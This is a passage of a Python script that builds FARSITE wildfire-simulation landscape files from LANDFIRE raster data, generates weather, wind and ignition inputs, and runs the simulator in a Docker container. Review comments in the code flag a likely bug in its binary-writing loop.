        header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
        header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
    j = i
    if groundFuels == 21:
        for i in range(j,j+2):
            packed, lo, hi, num, values = getHeaderInfo(datas[i])
            header = header + packed
    else:
        header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
        header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
    header = header+struct.pack('=ll',int(nCols),int(nRows))
    header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
    header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
    #print("Base five names:")
    for name in names[0]:
        #print(name)
        header = header + struct.pack('=256s',str.encode(name))
    if crownFuels == 21:
        #print("crownFuel names:")
        for name in names[1]:
            #print(name)
            header = header + struct.pack('=256s',str.encode(name))
    else:
        header = header + struct.pack('=256s',str.encode(''))
        header = header + struct.pack('=256s',str.encode(''))
        header = header + struct.pack('=256s',str.encode(''))
    if groundFuels == 21:
        #print("groundFuel names:")
        for name in names[2]:
            #print(name)
            header = header + struct.pack('=256s',str.encode(name))
    else:
        header = header + struct.pack('=256s',str.encode(''))
        header = header + struct.pack('=256s',str.encode(''))
    description = 'Automatically generated california landscape file.'
    header = header + struct.pack('=512s',str.encode(description))
    #print(len(header))
    imgSize = int(nCols*nRows)
    # NOTE(review): datas[0..2] are arrays, so these lengths are element
    # counts of the first three layers, not group sizes -- confirm.
    numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
    totalSize = int(imgSize*numImgs)
    print("Starting to write binary file.")
    with open(outname,'wb') as f:
        f.write(header)
        # NOTE(review): this writes len(datas) int16 values for EVERY index
        # up to totalSize (with a print per element) -- it emits far more
        # values than totalSize and will IndexError once i exceeds a
        # layer's length; the commented vectorized version below looks like
        # the intended approach.  Confirm before use.
        for i in range(0,totalSize):
            print(i)
            for data in datas:
                tmp = struct.pack('=h',int(data[i]))
                f.write(tmp)
    #allImgs = np.zeros((totalSize))
    #ct = 0
    #for data in datas:
    #    allImgs[ct::numImgs] = np.reshape(data,(imgSize))
    #    ct = ct+1
    #allImgs = np.array(allImgs,dtype=np.int16)
    #body = struct.pack(dataFormat,*allImgs)
    #with open(outname,'wb') as f:
    #    f.write(header+body)
    return datas, headers, names
def generateListLcpFiles(inDir):
    """Generate an LCP file for every extracted DEM tile found in ``inDir``.

    File names are expected to follow the getNamespace() convention:
    '<lon>_<lat>_<distance>_US_DEM2010.asc', where a leading 'n' encodes a
    minus sign and '-' encodes the decimal point.  Failures on individual
    tiles are reported and skipped (the original bare ``except: pass``
    silently swallowed every error).
    """
    files = glob.glob(inDir+'*US_DEM2010.asc')
    for file in files:
        fSplit = file.split(os.sep)[-1].split('_')
        lon = _decodeNamespaceCoordinate(fSplit[0])
        lat = _decodeNamespaceCoordinate(fSplit[1])
        distance = float(fSplit[2])
        try:
            generateLcpFile(lat,lon,distance,inDir)
        except Exception as e:
            # Best-effort batch processing: report and continue.
            print('Failed to generate LCP for %s: %s'%(file,e))

def _decodeNamespaceCoordinate(token):
    """Decode a getNamespace() coordinate token back to a float.

    A leading 'n' means negative; '-' separates the integer part from the
    4-digit decimal part (e.g. 'n118-2500' -> -118.25).
    """
    parts = token.split('-')
    if token[0] == 'n':
        return -1*(float(parts[0][1:])+float(parts[1])/10000)
    return float(parts[0])+float(parts[1])/10000
def getHeaderInfo(data):
    """Pack an LCP band-summary block: lo, hi, value count, and value table.

    Returns (packedBytes, lo, hi, num, values) where ``values`` is a
    100-slot int16 table.  When the band has more than 100 distinct values,
    ``num`` is -1, per the FARSITE landscape-file convention.
    """
    flat = data.flatten()
    _, firstIdx = np.unique(flat, return_index=True)
    # Distinct values in first-occurrence order.
    distinct = flat[np.sort(firstIdx)]
    if len(distinct) > 100:
        # Too many distinct values to enumerate: keep the first 100 (with
        # the band's last value in the final slot) and flag with num = -1.
        num = -1
        distinct = distinct[0:100]
        distinct[-1] = flat[-1]
        table = distinct
    else:
        # Sorted values stored starting at slot 1 of a zero-filled table.
        num = len(distinct)
        table = np.zeros((100,))
        table[1:num+1] = np.sort(distinct)
    table = np.array(table, dtype=np.int16)
    lo = int(data[data > -9999].min())
    hi = int(data.max())
    packed = struct.pack('=lll100l', lo, hi, num, *table)
    return packed, lo, hi, num, table
def checkPoint(query,polygon=[[-125,42],[-122,34],[-112,36],[-114.5,44]]):
    """Return True when the first query point lies inside ``polygon``.

    ``query`` is a list of [lon, lat] pairs; only the first point's
    containment result is returned.  The default polygon roughly bounds the
    supported California/Nevada region.
    """
    boundary = mpltPath.Path(polygon)
    return boundary.contains_points(query)[0]
def runFarsite(commandFile):
    """Launch TestFARSITE inside the farsite docker container for ``commandFile``.

    Blocks until the process exits.  Relies on Windows-specific tooling
    (winpty, CREATE_NEW_CONSOLE) and a hard-coded volume mount.
    """
    dockerStart = 'docker run -it -v E:\\projects\\wildfire-research\\farsite\\:/commonDir/ farsite'
    dockerCmd = './commonDir/farsite/src/TestFARSITE %s'%(commandFile)
    # NOTE(review): shell=False with a single command string works on
    # Windows (string goes to CreateProcess) but would fail on POSIX.
    p = subprocess.Popen('winpty '+dockerStart+' '+dockerCmd,shell=False, creationflags=subprocess.CREATE_NEW_CONSOLE)
    p_status = p.wait()
def getFuelMoistureData(string,params,fuelModels=np.linspace(0,1,2)):
    """Append a FARSITE FUEL_MOISTURES_DATA section to ``string``.

    One row per fuel model: model id, 1-h, 10-h, and 100-h dead fuel
    moistures plus live herbaceous / live woody moistures, all taken from
    ``params``.
    """
    rows = [string+'FUEL_MOISTURES_DATA: %.0f\n'%(fuelModels.shape[0])]
    for model in fuelModels:
        rows.append('%.0f %.1f %.1f %.1f %.1f %.1f\n'%(
            model,params['m1h'],params['m10h'],params['m100h'],
            params['lhm'],params['lwm']))
    return ''.join(rows)
def getMaxDay(Mth):
    """Return the number of days in month ``Mth`` (leap years ignored)."""
    if Mth == 2:
        return 28
    if Mth in (4, 6, 9, 11):
        return 30
    return 31
def incrementDay(Day,Mth):
    """Advance (Day, Mth) by one day, wrapping month and year boundaries.

    Leap years are ignored (February always has 28 days); after December 31
    the month wraps back to January.  Returns the new (Day, Mth) pair.
    """
    nextDay = Day + 1
    nextMth = Mth
    if nextDay > getMaxDay(nextMth):
        nextDay = 1
        nextMth = nextMth + 1
        if nextMth > 12:
            nextMth = 1
    return nextDay, nextMth
def getWeatherData(string,params,Elv,totalDays=2):
    """Append a FARSITE WEATHER_DATA section (one row per day) to ``string``.

    Parameters
    ----------
    string : str
        Input deck built so far.
    params : dict
        'Mth'/'Day' (start date), 'Pcp' (precipitation), 'mTH'/'xTH' (times
        of min/max temperature, rounded to hundreds), 'mT'/'xT' (min/max
        temperature), 'mH'/'xH' (min/max humidity), 'PST'/'PET' (precip
        start/end times, rounded to hundreds).
    Elv : float
        Station elevation written on every row.
    totalDays : int
        Number of daily rows to emit.

    Returns
    -------
    str
        ``string`` with the weather section appended (Metric units).
    """
    string = string+"WEATHER_DATA: %.0f\n"%(totalDays)
    Mth = round(params['Mth'])
    Day = round(params['Day'])
    maxDay = getMaxDay(Mth)
    Day = min(Day,maxDay)  # clamp to a valid day of the starting month
    # NOTE(review): Pcp/PST/PET are read but zeros are written in the rows
    # below -- confirm "no precipitation" is intended.
    Pcp = params['Pcp']
    mTH = round(params['mTH'],-2)
    xTH = round(params['xTH'],-2)
    mT = params['mT']
    xT = params['xT']
    xH = params['xH']
    mH = params['mH']
    PST = round(params['PST'],-2)
    PET = round(params['PET'],-2)
    for i in range(0,totalDays):
        # Mth Day Pcp mTH xTH mT xT xH mH Elv PST PET
        Day, Mth = incrementDay(Day,Mth)
        # Bug fix: the min-humidity column previously repeated xH; per the
        # column comment above the ninth field is mH.
        string = string+'%.0f %.0f %.1f %.0f %.0f %.1f %.1f %.1f %.1f %.0f %.0f %.0f\n'%(
                Mth,Day,0,mTH,xTH,mT,xT,xH,mH,Elv,0,0)
    string = string+"WEATHER_DATA_UNITS: Metric\n"
    return string
def getWindData(string,params,totalDays=2):
    """Append a FARSITE WIND_DATA section (hourly rows) to ``string``.

    Wind speed in ``params`` is in mph and is converted to km/h; one row is
    written per hour for ``totalDays`` days, with zero cloud cover.
    """
    string = string+"WIND_DATA: %.0f\n"%(totalDays*24)
    speedMph = params['windSpeed'] # mph
    direction = params['windDir']
    # mph -> km/h: 5280 ft * 12 in * 25.4 mm per mile / 10^6 mm per km.
    speedKph = speedMph*5280*12*25.4/(1000*1000) # km/h
    Mth = round(params['Mth'])
    Day = round(params['Day'])
    Day = min(Day,getMaxDay(Mth))  # clamp to a valid day of the month
    for dayIndex in range(0,totalDays):
        # Mth Day Hour Speed Direction CloudCover
        Day, Mth = incrementDay(Day,Mth)
        for Hour in range(0,2400,100):
            string = string+'%.0f %.0f %.0f %.1f %.1f %.1f\n'%(
                    Mth,Day,Hour,speedKph,direction,0)
    string = string+"WIND_DATA_UNITS: Metric\n"
    return string
def getMiscData(string):
    """Append fixed FARSITE spotting/crown-fire settings to ``string``."""
    settings = ("FOLIAR_MOISTURE_CONTENT: 100\n"
                "CROWN_FIRE_METHOD: Finney\n" # Either Finney or ScottRhienhardt
                "FARSITE_SPOT_PROBABILITY: 0.01\n"
                "FARSITE_SPOT_IGNITION_DELAY: 15\n"
                "FARSITE_MINIMUM_SPOT_DISTANCE: 30\n"
                "FARSITE_ACCELERATION_ON: 1\n")
    return string + settings
def getSimulationData(string,params,totalDays=2):
    """Append FARSITE start/end times and resolution settings to ``string``.

    The simulation starts two days after params['Mth']/params['Day'] (the
    first two days are covered by the weather/wind sections) at the
    fractional hour params['startTime'], and ends totalDays-2 days later at
    midnight.  Year 2016 is hard-coded.
    """
    Mth = round(params['Mth'])
    Day = round(params['Day'])
    Day = min(Day,getMaxDay(Mth))  # clamp to a valid day of the month
    startTime = params['startTime']
    wholeHour = np.floor(startTime)
    minute = int(round((startTime-wholeHour)*60,0))
    hour = int(wholeHour)
    # Skip the two spin-up days covered by the weather/wind sections.
    Day, Mth = incrementDay(Day,Mth)
    Day, Mth = incrementDay(Day,Mth)
    simStart = datetime.datetime(year=2016,month=Mth,day=Day,hour=hour,minute=minute)
    simEnd = datetime.datetime(year=2016,month=Mth,day=Day)+datetime.timedelta(days=totalDays-2)
    #eTime = sTime+datetime.timedelta(days=totalDays-3)
    string = string + "FARSITE_START_TIME: %s\n"%(simStart.strftime('%m %d %H%M'))
    string = string + "FARSITE_END_TIME: %s\n"%(simEnd.strftime('%m %d %H%M'))
    string = string + "FARSITE_TIME_STEP: 60\n"
    string = string + "FARSITE_DISTANCE_RES: 30.0\n"
    string = string + "FARSITE_PERIMETER_RES: 60.0\n"
    return string
def getIgnitionData(string, ignitionFile):
    """Append the FARSITE ignition shapefile reference to *string*."""
    return string + "FARSITE_IGNITION_FILE: %s\n" % ignitionFile
def saveFarsiteInput(string, file):
    """Write the assembled FARSITE input text *string* to path *file*."""
    with open(file, 'w') as handle:
        handle.write(string)
def generateFarsiteInput(file, elevation, ignitionFile, totalDays=5):
    """Build, save, and echo a complete FARSITE ``.input`` file.

    Draws random burn conditions via ``bp``, assembles every input
    section in order, writes the result to ``file + '.input'``, prints
    it, and returns the sampled parameter dictionary.
    """
    params = bp.getRandomConditions(bp.getStandardParamsInput(),
                                    allowDynamicModels=True)
    text = getFuelMoistureData('', params)
    text = getWeatherData(text, params, elevation, totalDays=totalDays)
    text = getWindData(text, params, totalDays=totalDays)
    text = getSimulationData(text, params, totalDays=totalDays)
    text = getMiscData(text)
    text = getIgnitionData(text, ignitionFile)
    saveFarsiteInput(text, file + '.input')
    print(text)
    return params
def getLcpElevation(file):
    """Return the median of the LCP file's first raster band.

    The first band of the landscape file is treated as elevation.
    """
    rasters, _, _ = readLcpFile(file)
    return np.median(rasters[0])
def makeCenterIgnition(file, N=5):
    """Write a square ignition polygon centered in the LCP extent.

    The square extends N cells in each direction from the landscape
    center and is saved next to *file* as ``<name>_ignite.SHP``.
    Returns the GeoDataFrame that was written.
    """
    imgs, names, header = readLcpFile(file)
    # NOTE(review): header offsets 1039-1045 appear to hold the UTM
    # bounding box and the cell resolution -- confirm against the LCP
    # file specification.
    east, west = header[1039], header[1040]
    north, south = header[1041], header[1042]
    dx, dy = header[1044], header[1045]
    cx = (east + west) / 2
    cy = (north + south) / 2
    corners = [[cx - N * dx, cy - N * dy],
               [cx - N * dx, cy + N * dy],
               [cx + N * dx, cy + N * dy],
               [cx + N * dx, cy - N * dy]]
    points = [Point(xyz) for xyz in corners]
    geometry = Polygon([[p.x, p.y] for p in points])
    # Single feature with ENTITY=0, VALUE=0 (FARSITE ignition attributes).
    data = gpd.GeoDataFrame([[0, 0]], columns=['ENTITY', 'VALUE'],
                            geometry=[geometry])
    data.to_file(driver='ESRI Shapefile',
                 filename=file.replace('.LCP', '_ignite.SHP'))
    return data
def generateCmdFile(lcps, inputs, ignites, outputs, cmdFile):
    """Write a FARSITE batch command file, one line per simulation run.

    Each line references the landscape, input, ignition, and output
    paths under the container's common data directory.
    """
    base = 'commonDir/data/'
    rows = ['%s%s %s%s %s%s 0 %s%s 0' % (base, lcp, base, inp, base, ign, base, out)
            for lcp, inp, ign, out in zip(lcps, inputs, ignites, outputs)]
    with open(cmdFile, 'w') as handle:
        handle.write(''.join(row + '\n' for row in rows))
if __name__ == "__main__":
    # Ad-hoc driver. Most alternative workflows below are retained as
    # commented-out history; only the uncommented lines actually run.
    # Paths are machine-specific (Windows drive letters).
    # Read the LANDFIRE 40-class fuel-model GeoTIFF.
    imgFile = 'G:\\WildfireResearch\\landfireData\\old\\US_140FBFM40\\1\\US_140FBFM40.tif'
    #imgFile = 'E:/projects/wildfire-research/landfireData/US_140FBFM40/1/test2.tif'
    data, lat, lon = readImgFile(imgFile)
    #plt.contourf(lon,lat,data)
    #inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/',
    #          'E:/projects/wildfire-research/landfireData/US_140FBFM40/2/',
    #          'E:/projects/wildfire-research/landfireData/US_140FBFM40/3/',
    #          'E:/projects/wildfire-research/landfireData/US_140FBFM40/4/']
    #outDir = 'E:/projects/wildfire-research/farsiteData/fireModel40/'
    #namespace = 'US_140FBFM40'
    #inDirs = ['E:/projects/wildfire-research/landfireData/US_DEM2010/1/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/2/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/3/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/4/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/5/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/6/',
    #          'E:/projects/wildfire-research/landfireData/US_DEM2010/7/']
    #outDir = 'E:/projects/wildfire-research/farsiteData/dem2010/'
    #namespace = 'US_DEM2010'
    #inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/']
    #namespace = 'US_140FBFM40'
    #splitImages(inDirs,namespace)
    #Tf, iTf = getTransformFromMtoD()
    # Sample 1000 random coordinates, roughly covering California
    # (lat 34-44 N, lon 114-121 W), with a 25 km extraction window.
    lats = np.random.random((1000,))*(44-34)+34
    lons = np.random.random((1000,))*(-114+121)-121
    distance = 25000
    #extractListOfCoordinates(lats,lons,distance)
    #limitAscLimits()
    indir = 'G:\\WildfireResearch\\farsiteData\\'
    generateListLcpFiles(indir)
    #indir = "E:/projects/wildfire-research/landfireData/Processed/"
    #names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40',
    #         'US_140CC','US_140CH','US_140CBH','US_140CBD']
    #namespace = indir+'california.LCP'
    #generateLcpFileTif(indir,names,namespace)
    #names = ['US_140CC','US_140CH','US_140CBH','US_140CBD']
    # The triple-quoted block below is a disabled end-to-end example run
    # (build inputs, ignition shapefile, command file, then run FARSITE).
    """
    commandFile = 'commonDir/farsite/example/Panther/runPanther.txt'
    inDir = 'E:/projects/wildfire-research/farsite/data/'
    cDir = 'commonDir/data/'
    #namespace = 'n117-9343_36-5782_3000'
    namespace = 'n114-0177_38-3883_25000'
    totalDays = 5
    lcpFile = namespace+'.LCP'
    inputFile = namespace+'.input'
    igniteFile = namespace+'_ignite.SHP'
    outputFile = namespace+'_out'
    cmdFile = inDir+'toRun.txt'
    cmdFileDocker = cDir+'toRun.txt'
    elevation = getLcpElevation(inDir+lcpFile)
    ignitionShape = makeCenterIgnition(inDir+lcpFile)
    fileName = inDir+namespace
    params = generateFarsiteInput(fileName,elevation,cDir+igniteFile,totalDays=totalDays)
    generateCmdFile([lcpFile],[inputFile],[igniteFile],[outputFile],cmdFile)
    runFarsite(cmdFileDocker)
    """
    #dataOut = gpd.GeoDataFrame.from_file(inDir+outputFile+'_Perimeters.shp')
    #dataIn = gpd.GeoDataFrame.from_file(inDir+igniteFile)
    #filename = 'E:/projects/wildfire-research/farsite/data/californiaRaw.LCP'
    #inDir = 'E:/projects/wildfire-research/farsite/data/'
    #print(checkPoint([[lon,lat]]))
    #datas, headers, names = generateLcpFile(lats,lons,distance,inDir)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.